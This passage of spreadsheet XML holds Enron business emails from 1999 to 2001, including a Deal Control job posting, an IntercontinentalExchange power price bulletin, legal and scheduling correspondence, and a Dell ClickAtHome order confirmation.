_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 9 Feb 2000 23:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'scott.pleus@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'danae.umbower@enron.com', 'michael.moscoso@enron.com', 'sally.beck@enron.com', 'jeremy.mills@enron.com'})</t>
  </si>
  <si>
    <t>Final copies of Memos</t>
  </si>
  <si>
    <t xml:space="preserve">fyi._x000D_
---------------------- Forwarded by Scott Pleus/HOU/ECT on 02/10/2000 07:56 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Matthew Adams@ENRON_x000D_
02/07/2000 01:44 PM_x000D_
To: Jean Mrha/Enron Communications@Enron Communications_x000D_
cc: Scott Pleus/HOU/ECT@ECT, David Crews/Enron Communications@Enron _x000D_
Communications, Rudi Zipter/HOU/ECT@ECT _x000D_
Subject: Final copies of Memos_x000D_
_x000D_
Updated per conversation with Jean Mrha:_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 1 May 2001 07:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Short-Term California Deal Control Opportunity</t>
  </si>
  <si>
    <t>There is a position available in Deal Control, reporting to Jeff Richter on _x000D_
the Short-Term California desk.  If you are interested in applying, please _x000D_
contact Amy FitzPatrick by close of business Friday, May 4, 2001._x000D_
_x000D_
Following is a summary of the responsibilities associated with this position._x000D_
_x000D_
Facilitate the entry of West Power deals, including short-term and long-term _x000D_
desks and the services desk, into the trading systems._x000D_
Follow-up with Deal Clearing and Settlements groups in Houston to verify _x000D_
accuracy of trades in the system.  This includes timely follow-up  with the _x000D_
traders for clarification._x000D_
Ensure that all trades are entered by a daily deadline._x000D_
Calculate and report weighted averages of daily price and volume to Dow Jones._x000D_
Prepare and distribute daily reports to ensure all books are balanced and _x000D_
report discrepancies to management._x000D_
Track and report daily and monthly error discrepancies to management and _x000D_
deliver reports for possible solutions to rectify errors. _x000D_
Calculate weighted averages between brokered trades and trades executed _x000D_
through Enron OnLine and the Intercontinental Exchange._x000D_
Report any technical mishaps to appropriate personnel in Houston and track _x000D_
computer problems until demonstrated resolutions._x000D_
Test any updated versions of applications requested by programmers and report _x000D_
back any adjustments needed._x000D_
_x000D_
Additional attributes one must possess to succeed in this position are _x000D_
persistence and a positive attitude.  Working knowledge of Microsoft Excel is _x000D_
essential, as is a general software aptitude._x000D_
_x000D_
If you have any questions regarding this role, please see either Jeff or Amy.</t>
  </si>
  <si>
    <t>Thu, 13 Dec 2001 08:46:43 -0800 (PST)</t>
  </si>
  <si>
    <t>Jesus</t>
  </si>
  <si>
    <t>I feel like a moron</t>
  </si>
  <si>
    <t>Wed, 16 Feb 2000 00:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re-Box &amp; Media News Group</t>
  </si>
  <si>
    <t xml:space="preserve">The Re-Box is for you files and the Media News needs to be reviewed._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jarrod_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Feb 2001 05:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bruce.lundstrom@enron.com'})</t>
  </si>
  <si>
    <t>Re: Francisco Pinto-Leite</t>
  </si>
  <si>
    <t>Bruce Lundstrom</t>
  </si>
  <si>
    <t xml:space="preserve">How did it turn out with Francisco?    Mark_x000D_
_x000D_
_x000D_
_x000D_
	Bruce Lundstrom@ENRON_DEVELOPMENT_x000D_
	02/21/2001 05:38 PM_x000D_
		 _x000D_
		 To: Mark E Haedicke@ECT_x000D_
		 cc: John Novak/SA/Enron@Enron_x000D_
		 Subject: Francisco Pinto-Leite_x000D_
_x000D_
Mark -_x000D_
_x000D_
Given that South America legal resources are stretched thin, we will be _x000D_
checking with Francisco to see if he has time to pick up Columbia.  He knows _x000D_
it well and I don't believe that it will be particularly time-consuming for _x000D_
him.  But it would help free up Miguel Mendoza a bit for other South America _x000D_
matters._x000D_
_x000D_
I will expect Francisco to be cognizant of his other Wholesale obligations in _x000D_
saying "yes" or "no."_x000D_
_x000D_
Bruce_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 11:24:37 -0700 (PDT)</t>
  </si>
  <si>
    <t>Revised: Power Indices</t>
  </si>
  <si>
    <t xml:space="preserve">IntercontinentalExchange _x000D_
Firm Power Price Bulletin _x000D_
_x000D_
For Power Delivered on Tuesday, October 23, 2001 _x000D_
(Trade Date of Monday, October 22, 2001) _x000D_
*** REVISED *** _x000D_
_x000D_
Click here to access index history &lt;http://www.intcx.com/SubscriberServlet/subscriberservlet.class?operation=powerIndexForm&amp;hub=All&gt;. _x000D_
_x000D_
* volume represents sell-side only * _x000D_
_x000D_
Hub	 High	 Low	 Wtd Avg Index	 Change ($)	 Vol (Mwh)	 _x000D_
Cinergy	$23.00	$19.25	$20.50	- .34	40,800	_x000D_
Comed	$20.00	$18.75	$18.91	- .87	8,800	_x000D_
Entergy	$23.75	$20.00	$22.10	+ 1.46	18,400	_x000D_
Nepool	$38.00	$37.25	$37.50	- .87	11,200	_x000D_
Palo Verde	$27.75	$25.50	$27.09	- .28	13,200	_x000D_
PJM-West	$25.00	$24.00	$24.21	- 1.10	40,800	_x000D_
SP-15	$27.75	$27.00	$27.35	+ .12	14,400	_x000D_
TVA	$21.50	$20.25	$20.63	- .83	7,200	_x000D_
_x000D_
Includes all trades done from 6 AM to 11 AM Central Prevailing Time on the trade date specified for financially firm power delivered during the on-peak hours (6 AM - 10 PM CPT for Eastern hubs / 6 AM - 10 PM Pacific Prevailing Time for Western hubs) on the delivery date(s) specified. _x000D_
_x000D_
IntercontinentalExchange is the world's most liquid trading platform for over-the-counter energy and metals.  Active markets include North American power and natural gas, global crude and refined oil products, and precious metals.  Traded instruments include forwards, swaps, and options. _x000D_
_x000D_
In order to receive the proprietary information contained in this email, you acknowledge and agree that you shall not further disseminate the IntercontinentalExchange Market Data contained herein to any person or entity without the express written consent of IntercontinentalExchange.   Furthermore, you acknowledge that (1) IntercontinentalExchange has exclusive and valuable property rights in this data; (2) IntercontinentalExchange's data is being made available to you only for your own business or personal activities; and (3) you cannot communicate the data, in any form, to any other person or entity without the express written consent of IntercontinentalExchange. _x000D_
_x000D_
This data is provided to you free of charge.  IntercontinentalExchange reserves the right to cancel this service at any time for any reason or no reason at all. _x000D_
_x000D_
You agree that IntercontinentalExchange does not make any representations or warranties, express or implied, with respect to the data. _x000D_
_x000D_
To become an Exchange Participant or inquire about the indices, please contact sales@intcx.com &lt;mailto:sales@intcx.com&gt;. _x000D_
_x000D_
To unsubscribe from this service, click here unsubscribe &lt;http://www.intcx.com/subscribe.html&gt;. _x000D_
_x000D_
_x000D_
?Copyright IntercontinentalExchange, Inc. 2001, All Rights Reserved. </t>
  </si>
  <si>
    <t>Tue, 27 Feb 2001 09:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'harry.kingerski@enron.com', 'jeff.dasovich@enron.com', 'sandra.mccubbin@enron.com', 'mark.palmer@enron.com', 'karen.denne@enron.com', 'john.neslage@enron.com', 'richard.shapiro@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Enron Wind  - NEXT STEPS</t>
  </si>
  <si>
    <t xml:space="preserve">Michael Tribolet held a conference call this evening to discuss Enron Wind's _x000D_
legal obligations given SCE's non-payment.  In general, given the legal _x000D_
structure of Enron Wind, some action may be required from a partnership _x000D_
perspective._x000D_
_x000D_
The key next step is action on SB47 - Interim Short-Term Avoided Cost _x000D_
Methodology.  Enron Wind is unlikely to take any action if real progress is _x000D_
made by this Friday.  If not, a different action plan will occur.   This may _x000D_
change if other renewable QFs sue (for instance FP&amp;L - who has retained _x000D_
counsel but don't want to be the first to take action)._x000D_
_x000D_
They will begin to draft some pleadings to prepare for legal action (in case _x000D_
this is necessary).  _x000D_
_x000D_
Michael Tribolet is on point to hear if EWC takes any action and we should be _x000D_
apprised before they move._x000D_
_x000D_
Jim_x000D_
  _x000D_
</t>
  </si>
  <si>
    <t>Thu, 30 Nov 2000 10:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Retail in South America</t>
  </si>
  <si>
    <t xml:space="preserve">Mark, I really don't think we need to have this all hands mtg - in particular _x000D_
I don't want to drag Lou into this discussion again._x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 11/30/2000 _x000D_
06:34 PM ---------------------------_x000D_
_x000D_
_x000D_
James M Bannantine@ENRON_DEVELOPMENT_x000D_
11/30/2000 05:46 PM_x000D_
To: David W Delainey/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Retail in South America  _x000D_
_x000D_
I will be in Houston next week and we can discuss if you want to.  The idea _x000D_
here was not to explain the retail product offering or any concern of _x000D_
dropping the ball, rather a one off download of where we currently stand in _x000D_
South America  and high level overview of  how to work together to keep _x000D_
everyone on the same sheet of music and not miss  a beat.  For instance, _x000D_
there is already a local staff in place to handle initial deal flow (which is _x000D_
already happening) that needs to benefit from Dan's systems and best _x000D_
practices, but which has already based what they are doing on how Dan _x000D_
operates.  We have always benefited from as much of Dan's and Marty's _x000D_
attention as we could get over the past year and a half as we set this up.   _x000D_
By the same token we can't be competitive in this business in Brazil on a _x000D_
cost basis from Houston, so that is why we have formed local staff based on _x000D_
EES systems and practices, and hopefully some controls as we go forward.  It _x000D_
is late here and my assistant is gone but I think the meeting is already _x000D_
scheduled.  If you can't be there maybe we can backbrief you._x000D_
_x000D_
_x000D_
_x000D_
David W Delainey@ECT_x000D_
11/30/2000 11:21 AM_x000D_
To: James M Bannantine/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
_x000D_
Subject: Retail in South America_x000D_
_x000D_
Jim, I really don't see a need for this meeting - you can count on us not _x000D_
dropping the ball.  I have a good understanding of the retail product _x000D_
offering, in fact, we lead the outsourcing sales process for the large _x000D_
industrial customers in NA until EES bought back their minority _x000D_
shareholders.  I have a very good relationship with Dan Leff and Sunde.  I _x000D_
already have Dan's committment to help service the execution of the business _x000D_
initially.  As it grows and the product proves itself out we can staff._x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 11/30/2000 _x000D_
11:15 AM ---------------------------_x000D_
_x000D_
_x000D_
James M Bannantine@ENRON_DEVELOPMENT_x000D_
11/30/2000 10:33 AM_x000D_
To: Lou L Pai@EES, Mark Frevert@Enron, David W Delainey@ECT, Dan Leff@EES, _x000D_
Orlando Gonzalez/SA/Enron@Enron, Joe Kishkill/SA/Enron@Enron, David W _x000D_
Delainey@ECT, Don Black/SA/Enron@Enron_x000D_
cc: Marcia Manarin/SA/Enron@Enron _x000D_
Subject: Retail in South America_x000D_
_x000D_
My assistant will be putting together a meeting/conference call for next _x000D_
WEdnesday on how to move forward with retail in South America given the plan _x000D_
to have retail report through the wholesale group in South America for 2001.  _x000D_
Key points for discussion will be:_x000D_
_x000D_
-brief overview of the state of the retail business in South America_x000D_
-brief overview of the current retail organization and how it would report _x000D_
through wholesale_x000D_
-discussion of how we  move from where we are currently (good value _x000D_
proposition, customer's signed up, organization to implement)  to make the _x000D_
retail business a success:_x000D_
 -by having an interface with EES for best practices, systems, etc., _x000D_
 -under wholesale budget and organization for simplicity and cost sake_x000D_
_x000D_
_x000D_
Wednesday is Mark's first day back in the office from Europe, Dan will be in _x000D_
Europe, Orlando will be in Brazil, others I believe in Houston, so we will _x000D_
try to accomodate everyone's schedules or at least get a quorum of those _x000D_
involved present on the call/meeting. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 31 Oct 2001 07:01:59 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'travis.mccullough@enron.com', 'pinto.leite@enron.com', 'harlan.murphy@enron.com', 'e-mail &lt;.lech@enron.com&gt;', 'peter.del@enron.com', 'brent.hendry@enron.com', 't..hodge@enron.com', 'tanya.rohauer@enron.com', 'e-mail &lt;.rick@enron.com&gt;', 'peter.keohane@enron.com', 'steve.van@enron.com', 'elizabeth.sager@enron.com', 'n..gray@enron.com', 'paul.simons@enron.com', 'morris.clark@enron.com', 'angela.davis@enron.com', 'john.viverito@enron.com', 'gerald.nemec@enron.com', 'carol.st.@enron.com', 'sara.shackleton@enron.com', 'h..douglas@enron.com', 'frank.sayre@enron.com', 'marie.heard@enron.com', 'c..koehler@enron.com', 'tana.jones@enron.com', 'david.portz@enron.com', 'julia.murray@enron.com', 'alan.aronowitz@enron.com', 'lisa.mellencamp@enron.com', 'credit &lt;.williams@enron.com&gt;', 'leslie.hansen@enron.com'})</t>
  </si>
  <si>
    <t>Master Netting Agreement Assignments</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the current list of master netting agreement assignments.  We will circulate a revised list periodically._x000D_
_x000D_
_x000D_
		 </t>
  </si>
  <si>
    <t>Mon, 22 Jan 2001 05:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'michelle_dorsett@dell.com'})</t>
  </si>
  <si>
    <t>FW: Dell Computer Order</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; DELL &amp; ENRON ClickAtHome ORDER CONFIRMATION_x000D_
&gt;_x000D_
&gt; Thank you for your Enron ClickAtHome order!  Please read and retain this_x000D_
&gt; e-mail for your records.  It contains important information relating to_x000D_
&gt; your order that should be used in any future communications with Dell._x000D_
&gt;_x000D_
&gt; Your Dell customer number is:   12831599_x000D_
&gt;_x000D_
&gt; Your order number is:  506026004_x000D_
&gt;_x000D_
&gt; Your total "Out of Pocket" amount:  $1384.35_x000D_
&gt; The total "Out of Pocket" amount includes upgrade costs, shipping and_x000D_
&gt; taxes._x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Your Online Sales Point of Contact:_x000D_
&gt; We are here to assist you with your order if needed. Our office hours are_x000D_
&gt; Monday- Friday, 8am-7pm Central Standard Time.  You can reach our office_x000D_
&gt; by calling 1-866-220-3355 or through e-mail at:_x000D_
&gt; US_EPP_Clickathome@dell.com ._x000D_
&gt;_x000D_
&gt; Estimated Ship Date:_x000D_
&gt; We estimate that your order should be shipped on or before 01/31/01._x000D_
&gt; Although we do not anticipate a delay in your order, we cannot guarantee_x000D_
&gt; the shipping date as we occasionally run into unexpected delays in_x000D_
&gt; manufacturing.  Your order is being shipped to you under Dell's terms and_x000D_
&gt; conditions of sale found at: www.dell.com._x000D_
&gt;_x000D_
&gt; Total Satisfaction Policy:_x000D_
&gt; If you wish to cancel your order for any reason within 30 days, we'll_x000D_
&gt; refund amounts paid by you, minus shipping costs, no questions asked.  You_x000D_
&gt; are responsible for the cost of shipping your system back to us._x000D_
&gt; EPP Customer Care contact options: 1-866-220-3355,  option 4 or use the_x000D_
&gt; e-mail box  US Relationship EPP@dell.com ._x000D_
&gt;_x000D_
&gt; How to Check Order Status:_x000D_
&gt; If you would like to check the status of your order, please call Dell's_x000D_
&gt; automated order status inquiry system at:  1-800-433-9014, or visit Dell's_x000D_
&gt; Order Status Page at: http://wwwapp.us.dell.com/us/en/ordstat/index.asp._x000D_
&gt;_x000D_
&gt; You can also register to have Dell e-mail you when your order is shipped,_x000D_
&gt; by going to: http://wwwapp.us.dell.com/us/en/ordstat/watchreg.asp?ordnum._x000D_
&gt;_x000D_
&gt; How to reach a Technical Support Representative:_x000D_
&gt; Once you have received your equipment, if you need to contact a Dell_x000D_
&gt; technical support representative, please call 1-866-220-3355, option 3._x000D_
&gt; You will be asked to give your "Service Tag Number".  The "Service Tag_x000D_
&gt; Number" is a five digit alphanumeric number written on the white bar code_x000D_
&gt; label on the back of the system.  Please have this number ready before you_x000D_
&gt; contact the technical support representative._x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Thank you for participating in the Dell/ Enron ClickAtHome program.  It is_x000D_
&gt; my pleasure to work with you._x000D_
&gt;_x000D_
&gt; Sincerely,_x000D_
&gt; Michelle Dorsett_x000D_
&gt; EPP On-Line_x000D_
&gt; Dell Computer Corporation_x000D_
&gt; &lt;mailto:michelle_dorsett@dell.com&gt;_x000D_
&gt; 1.877.692.2638 X 49794_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; </t>
  </si>
  <si>
    <t>Tue, 19 Dec 2000 02:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'nick.paraschos@enron.com', 'wenyao.jia@enron.com'})</t>
  </si>
  <si>
    <t>Re: Testing IR &amp; FX VAR</t>
  </si>
  <si>
    <t>Nick and Winston,_x000D_
I understand that IR&amp;FX VAR numbers are calculated every day in RisktRac. _x000D_
This results are overwritten_x000D_
everyday in the database table by the official numbers calculated with the _x000D_
old version of the code._x000D_
For the consistent testing we need historical results for each IR and FX _x000D_
sub-portfolio._x000D_
Can we store the numbers every day?_x000D_
_x000D_
Tanya</t>
  </si>
  <si>
    <t>Mon, 17 Jul 2000 08:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rita.houser@enron.com'})</t>
  </si>
  <si>
    <t>4102  Meas CI</t>
  </si>
  <si>
    <t>Phil Lowry, Rick Craig, Bob Hall &amp; Julia White _x000D_
Alliece Morris x36896</t>
  </si>
  <si>
    <t>Tue, 3 Apr 2001 02:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tonai.lehr@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'joan.quick@enron.com', 'christopher.clark@enron.com', 'brian.redmond@enron.com', 'gerald.nemec@enron.com', 'nick.cocavessis@enron.com', 'rusty.belflower@enron.com', 'mark.castiglione@enron.com', 'walt.hamilton@enron.com', 'david.owen@enron.com', 'teresa.bushman@enron.com', 'barbara.gray@enron.com', 'arvel.martin@enron.com', 'becky.caudle@enron.com', 'don.rollins@enron.com', 'mark.whitt@enron.com', 'scott.josey@enron.com'})</t>
  </si>
  <si>
    <t>Crescendo Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">When: Tuesday, April 03, 2001 10:00 AM-11:00 AM (GMT-06:00) Central Time (US _x000D_
&amp; Canada)._x000D_
Where: EB3335_x000D_
_x000D_
*~*~*~*~*~*~*~*~*~*_x000D_
</t>
  </si>
  <si>
    <t>Mon, 23 Aug 1999 03:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Enron Online / Legal</t>
  </si>
  <si>
    <t xml:space="preserve">Sorry for not getting back to you sooner (I was out of town last weeek) - _x000D_
unfortunately, I have a 2:00 already on my calendar but am available later.  _x000D_
If you want to meet with Alan &amp; Jeff first and see me afterwards, that's ok _x000D_
with me._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Tara Sweitzer_x000D_
08/19/99 01:22 PM_x000D_
To: Mark - ECT Legal Taylor/HOU/ECT@ECT, Jeffrey T Hodge/HOU/ECT@ECT, Alan B _x000D_
Aronowitz/HOU/ECT@ECT, Torrey Moorer/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Enron Online / Legal_x000D_
_x000D_
_x000D_
Torrey, and myself would like to set-up a time for Monday to discuss a few _x000D_
EOL issues that we feel pertinent to the Legal Department. If you could let _x000D_
me know if  the afternoon ( 2:00) works for you I would greatly appreciate _x000D_
it. Once I hear from you I will set-up a room for us all to meet. _x000D_
_x000D_
Thank you for your time, TARA SWEITZER_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 01:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Avalilability</t>
  </si>
  <si>
    <t>Sue and Jeff,_x000D_
_x000D_
I received a vm message from Mona this morning wondering about your schedules _x000D_
today.  Please let me know and I will get back to her._x000D_
_x000D_
Thank you_x000D_
_x000D_
Esther</t>
  </si>
  <si>
    <t>Tue, 21 Nov 2000 05:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'paul.j.broderick@enron.com'})</t>
  </si>
  <si>
    <t>http://gasfundy.corp.enron.com/gas/framework/default.asp</t>
  </si>
  <si>
    <t>Sun, 8 Oct 2000 12:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>customer mailout</t>
  </si>
  <si>
    <t xml:space="preserve">Hello.  The west gas desk would like to send a mailout to our EOL customers _x000D_
regarding the new opportunity to trade "odd lots" on every physical product.  _x000D_
EOL has been instrumental in providing liquidity to previously illiquid _x000D_
physical delivery points in the west for standard volumes of 5000 mmbtu/d and _x000D_
greater, but we would like to notify our customers that EOL will now _x000D_
accommodate odd size lots, in 1 mmbtu increments.  This will allow us to _x000D_
trade the "non-standard" volumes with all of the market._x000D_
_x000D_
Do we have a creative team that might be able to assist us in our efforts?  _x000D_
We were thinking about a one page mailout with a clear message.  We would _x000D_
like it to be very upbeat and funny.  _x000D_
_x000D_
Thank you for your assistance.  I can be reached at x37031._x000D_
_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Mike Grigsby_x000D_
Director, West Gas trading_x000D_
---------------------- Forwarded by Mike Grigsby/HOU/ECT on 10/08/2000 07:26 _x000D_
PM ---------------------------_x000D_
_x000D_
10/02/2000 11:59 AM_x000D_
Adriane Moratto@ENRON_x000D_
Adriane Moratto@ENRON_x000D_
Adriane Moratto@ENRON_x000D_
10/02/2000 11:59 AM_x000D_
10/02/2000 11:59 AM_x000D_
To: Mike Grigsby/HOU/ECT@ECT_x000D_
cc: Kal Shah/HOU/ECT@ECT _x000D_
Subject: customer mailout_x000D_
_x000D_
Per our conversation last week.  Sorry for the delay.  We can help you with _x000D_
your mailout.  Please see the following and contact Kal Shah with additional _x000D_
questions in regards to this project.  Let me know if I can do anything else _x000D_
for you._x000D_
_x000D_
adriane_x000D_
---------------------- Forwarded by Adriane Moratto/NA/Enron on 10/02/2000 _x000D_
11:57 AM ---------------------------_x000D_
From: Kal Shah@ECT on 10/02/2000 11:45 AM_x000D_
To: Adriane Moratto/NA/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: question  _x000D_
_x000D_
Will be happy to help this group.  They'll need to agree to the following:_x000D_
_x000D_
1.  They pay for the cost (to be determined depending on the quality of the _x000D_
mailing)_x000D_
2.  They provide a mailing list with following separate columns:_x000D_
First name_x000D_
Last Name_x000D_
Company Name_x000D_
Address_x000D_
City_x000D_
State_x000D_
Zip_x000D_
3.  Give us a draft of the text for the mailing_x000D_
4.  Give us 5 working days to get it out.  (we will try to do it faster, but _x000D_
it depends on several factors)_x000D_
_x000D_
Kal_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 31 Oct 2001 12:51:05 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rhackman@lehman.com'})</t>
  </si>
  <si>
    <t>frozenset({'tim.despain@enron.com', 'sara.shackleton@enron.com', 'clint.freeland@enron.com'})</t>
  </si>
  <si>
    <t>extension - again</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 &lt;&lt;Confirm modification oct 31_p.doc&gt;&gt;_x000D_
_x000D_
Russell F. Hackmann, CFA_x000D_
Lehman Brothers Corporate Equity Derivatives_x000D_
(201) 524-2279 phone_x000D_
(917) 596-2936 cell_x000D_
rhackman@lehman.com_x000D_
_x000D_
_x000D_
_x000D_
------------------------------------------------------------------------------_x000D_
This message is intended only for the personal and confidential use of the designated recipient(s) named above.  If you are not the intended recipient of this message you are hereby notified that any review, dissemination, distribution or copying of this message is strictly prohibited.  This communication is for information purposes only and should not be regarded as an offer to sell or as a solicitation of an offer to buy any financial product, an official confirmation of any transaction, or as an official statement of Lehman Brothers.  Email transmission cannot be guaranteed to be secure or error-free.  Therefore, we do not represent that this information is complete or accurate and it should not be relied upon as such.  All information is subject to change without notice._x000D_
_x000D_
_x000D_
 - Confirm modification oct 31_p.doc </t>
  </si>
  <si>
    <t>Thu, 10 Aug 2000 07:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'henry.means@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'scott.gilchrist@enron.com', 'monica.talan@enron.com', 'ranendra.sengupta@enron.com', 'john.ambler@enron.com', 'janie.bonnard@enron.com', 'caroline.schaeffer@enron.com', 'katrin.haux@enron.com', 'miguel.padron@enron.com', 'richard.leibert@enron.com', 'mitchell.taylor@enron.com', 'dennis.vegas@enron.com', 'johan.zaayman@enron.com', 'john.hardy@enron.com'})</t>
  </si>
  <si>
    <t>Updated Summer Materials</t>
  </si>
  <si>
    <t xml:space="preserve">Please find attached the updated press release and Q&amp;A documents._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 1 May 2001 06:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: PCGs between Enron N.A. and Cargill-Alliant</t>
  </si>
  <si>
    <t xml:space="preserve"> -----Original Message-----_x000D_
From:  Andrzej_Kabarowski@cargill.com@ENRON _x000D_
[mailto:IMCEANOTES-Andrzej+5FKabarowski+40cargill+2Ecom+40ENRON@ENRON.com] _x000D_
Sent: Tuesday, May 01, 2001 1:19 PM_x000D_
To: Sacks, Edward; Andrzej_Kabarowski@cargill.com_x000D_
Subject: PCGs between Enron N.A. and Cargill-Alliant_x000D_
_x000D_
I am attaching the latest versions.  Most of the additional changes_x000D_
were accepted in an attempt to get these executed asap, particularly as_x000D_
I have been out of town the last week or so.  We did change payment_x000D_
back to 10 days as this is essentially where our corporate treasury is_x000D_
confident it can process such claims in a prudent manner.  I hope this_x000D_
is not a deal breaker.  We did ultimately accept your Enron affiliate_x000D_
set off language in your PCG to us, although we do not have such_x000D_
language in our PCG to you._x000D_
_x000D_
Please reflect on the latest status.  I believe we do have a document_x000D_
that we can both execute.  If your lawyers still have questions let me_x000D_
know so I can refer them to our legal counsel if necessary._x000D_
_x000D_
Thank you and best regards_x000D_
_x000D_
=============================_x000D_
Andrzej Kabarowski_x000D_
WW Credit Manager_x000D_
Global Petroleum Trading_x000D_
NatGas/Electricity Trading_x000D_
CRMPG_x000D_
-----------------------------_x000D_
Tel: 952-984 3664_x000D_
Fax: 952-984 3763_x000D_
=============================_x000D_
_x000D_
_x000D_
 - ECTRcapcg1.doc_x000D_
 - ECTRcglpcg1.doc</t>
  </si>
  <si>
    <t>Tue, 20 Jun 2000 06:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Int. Transportation on EOL</t>
  </si>
  <si>
    <t xml:space="preserve">Mark  I wanted to put you on notice that HPL wants to put intrastate _x000D_
transport on line with EOL.....please advise what you will need from the HPL _x000D_
legal group      thanks bng_x000D_
----- Forwarded by Barbara N Gray/HOU/ECT on 06/20/2000 01:35 PM -----_x000D_
_x000D_
	Steve Van Hooser_x000D_
	06/20/2000 11:36 AM_x000D_
		_x000D_
		 To: Edward D Gottlob/HOU/ECT@ECT_x000D_
		 cc: Dale Neuner/HOU/ECT@ECT, Thomas A Martin/HOU/ECT@ECT, Barbara Gray, _x000D_
Julie Gomez, (bcc: Barbara N Gray/HOU/ECT)_x000D_
		 Subject: Re: Int. Transportation on EOL_x000D_
_x000D_
Ed,_x000D_
_x000D_
Have you been directed to Louise Kitchen or to any of her folks? She's been _x000D_
pretty hands on with the migration of new business lines on to Enron Enron _x000D_
Online._x000D_
_x000D_
Steve Van Hooser_x000D_
_x000D_
_x000D_
_x000D_
	Edward D Gottlob_x000D_
	06/20/2000 09:05 AM_x000D_
		 _x000D_
		 To: Dale Neuner/HOU/ECT@ECT, Thomas A Martin/HOU/ECT@ECT, Steve Van _x000D_
Hooser/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Int. Transportation on EOL_x000D_
_x000D_
Dale,_x000D_
_x000D_
Tom and I would like to offer int. transportation on HPL on EOL.  I have _x000D_
worked out a schematic of what I think the service should look like.  Should _x000D_
I get with you or someone else to review what I am going to propose and start _x000D_
the process?  EDG_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 3 Aug 2000 06:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>model</t>
  </si>
  <si>
    <t xml:space="preserve">here you go,_x000D_
_x000D_
tell me what you think._x000D_
_x000D_
i spent a lot of time on this_x000D_
</t>
  </si>
  <si>
    <t>Thu, 1 Jun 2000 21:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: B&amp;P Alumni Lunch</t>
  </si>
  <si>
    <t xml:space="preserve">both are good for me_x000D_
_x000D_
_x000D_
_x000D_
	Darlene C Forsyth_x000D_
	06/01/2000 10:44 AM_x000D_
		 _x000D_
		 To: Richard B Sanders/HOU/ECT@ECT, Anthony Duenner/Enron _x000D_
Communications@Enron Communications, Stuart Zisman/HOU/ECT@ECT, Robert C _x000D_
Williams/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Morris Richard Clark/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: B&amp;P Alumni Lunch_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
_x000D_
_x000D_
I am trying to reschedule the Bracewell &amp; Patterson alumni lunch._x000D_
_x000D_
Please let me know which of the following fits:_x000D_
_x000D_
Wednesday, June 14_x000D_
Tuesday, June 20_x000D_
_x000D_
Thanks,_x000D_
Darlene_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 05:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Transportation Cost increase</t>
  </si>
  <si>
    <t xml:space="preserve">Jane-_x000D_
_x000D_
